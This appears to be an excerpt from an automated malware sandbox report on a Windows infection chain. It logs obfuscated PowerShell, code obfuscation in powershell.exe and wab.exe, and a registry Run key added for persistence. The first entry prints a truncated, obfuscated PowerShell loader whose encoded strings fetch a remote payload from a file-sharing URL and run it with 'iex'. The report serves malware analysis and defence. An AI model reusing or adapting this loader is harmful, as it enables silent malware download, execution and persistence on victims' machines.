Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Riffelgange = 1;$Authorish='Substrin';$Authorish+='g';Function Shockhead($Kaputt){$Spisefrikvarterernes=$Kaputt.Length-$Riffelgange;For($Ratihabumr=5; $Ratihabumr -lt $Spisefrikvarterernes; $Ratihabumr+=(6)){$Udsagnsleddenes+=$Kaputt.$Authorish.Invoke($Ratihabumr, $Riffelgange);}$Udsagnsleddenes;}function sabotage($Velal){& ($Tanquelinian) ($Velal);}$Greenheart=Shockhead 'OutraMIndowoAigrezBestoiSkspolMusikl ,utsa Brne/Gr.nd5.itin.Afdel0Up,ai Zw ng(SynapWNjereiCoresnD,agsdTosdeoHerrgwkroe sbil,e .runeNStrafTPraec Forma1Myoli0The,m. Bort0Opfi,;Enkel Arch,WIrradiObsern Kyst6.odra4Banju; eval For axUdban6Czare4Spat ;under TayerrUnd,iv tred:M.ckb1Jacqu2Maime1 Seri.Deesk0Allop) Brad BeregGHemodeSalewc DiskkRandmoVolit/ Qu z2 Kruk0Fo.nu1Ordfo0 enio0,anlo1jetst0Invas1Gaska Knif.FS criiRgerirGillyeStridf Toitovexdex.nnek/Gener1Orke.2minst1Bo.it. ,eha0Dia,o ';$Feline=Shockhead 'StripUOverts PoliegalehrOsobe-ForaaASkinkgOmgiveEnwinnSanc tJinri ';$ostler=Shockhead 'goo,whKvikkt Nikot ousp udstsNemme:Ha dw/Tjles/GorvadAntiprChivei Sie.vKontreDansk.FellygPrivaoP eezoViolig B,dflAmpeleO var.IsospcSubtroMowbumJacke/Tilbau VictcOpsge?RibboeTurp.xI,prgpTelevoHofchrhavait pakk= NurtdbearloTrevewPutnanFu,ill.resuoextena SpirdSe vi& SundiHistodManja= Allo1FrugthEncheJ estyNymphvNucl gappasAA ninV U.pebPoachPUgtetJJol,e7 .eww5Lob.tW TyphNEndomnAnalyYharmem AliqHadvenv Al ypTurnuQGenerDKropskNy.tiE.nobs9 WindK BeunTMon sfapoloZDisozPSnesksAfvaekInte ';$Olympier=Shockhead 'Det r>R dio ';$Tanquelinian=Shockhead 'Succei,nackeFascixCiv l ';$Aminobenzamide = Shockhead 'PreloeForcec FilihGuelpoNone. B cki%B,ahmainterpInserpBrunldUd rmaAnd.lt KarbaAquar% Bri.\ kattPBlodrrIndhoe MonahNav,ea,egiststr,irmocame B lldAfsky.Unc.vFDomsfiJav.ldRevi Oc.i&Stnne&Chrys Skrine OvercHendehMelleoDm,ni Tritu$ sept ';sabotage (Shockhead 'Bigba$Storhg R,tilTrim oUnadvb DissaSamm.lCr,nk: CecoAForemaKi,kenUnfledSportePsychlToledyBramsdTan eeNrga nSmaafs Exce=rotte(T.skncB dummvalerdDelib Demat/InaudcBiogr Fa el$WretcAnormam ForsiEnneanmidnio ColebUnexteKlonen undsz SkumaBevilmTvrf i DestdFlexueB,lim)Adnot ');sabotage (Shockhead 'Form.$WienegPal.nlAlleyoballobEnedia BlgelStyre:ExpouUSchoon,mbets EngahLydliu Hel.nK.tukn.kraleUn.erdAlcoh=Overf$,iurooNaticsK,loltDimpll S,mieDann rforgl.Oplgns ominp DubblafgrsiGangat alsr(U orb$musheOGl.cilOrdney nordmTeorip iploi,ympae HeltrBeta )Fresn ');$ostler=$Unshunned[0];sabotage (Shockhead 'Super$Ups agHeterlPal.to Smelb Br.aaParanl mikr:SloucMHasareWhalesFrdigsPentaa Gen.nEvitisVirag=RadioNAitche G,unwPeete-Prea,Odykkeb Ma sj.verbeH kkecAnl,st Phy. UdbarS,eceny,emuns FiprtMelame Klipmalkef..vnbyN UrokeSaltatEndur.samarWStavneAp,erbDikotCUnderl TrokiInj reStudenStrimtDowse ');sabotage (Shockhead 'Rigni$A ticMEjende Be nslichestraneaTono,nGgesnsGerma.,etalHW.noneThereabeford emme strorPhi.os klo,[Joint$biskuFforbieShor.l Yletimock Jump to behavior
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FF848F30944 push E95B7BD0h; ret 3_2_00007FF848F309C9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FF848F309F4 push E95B7BD0h; ret 3_2_00007FF848F309C9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 9_2_00A70C95 push edi; retf 9_2_00A70C3A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 9_2_00A70C3D push edi; ret 9_2_00A70CC2
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 9_2_0408662A pushfd ; ret 9_2_0408662B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 9_2_04086422 pushfd ; iretd 9_2_0408642C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 9_2_04089632 push ebp; iretd 9_2_0408963A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 9_2_04088A56 push edx; retf 9_2_04088A58
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 9_2_040850B7 push ecx; ret 9_2_040850B8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 9_2_04088AE2 push FFFFFFBCh; ret 9_2_04088AE4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 9_2_04089F3C push ebp; iretd 9_2_04089F7D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 9_2_04089F7E push ebp; iretd 9_2_04089F7D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 9_2_04089F7E pushfd ; iretd 9_2_04089FE7
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 9_2_0408A7E1 push esp; retf 9_2_0408A7F6
Source: C:\Windows\SysWOW64\reg.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Andelsbevaegelsen Jump to behavior
Source: C:\Windows\SysWOW64\reg.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Andelsbevaegelsen Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
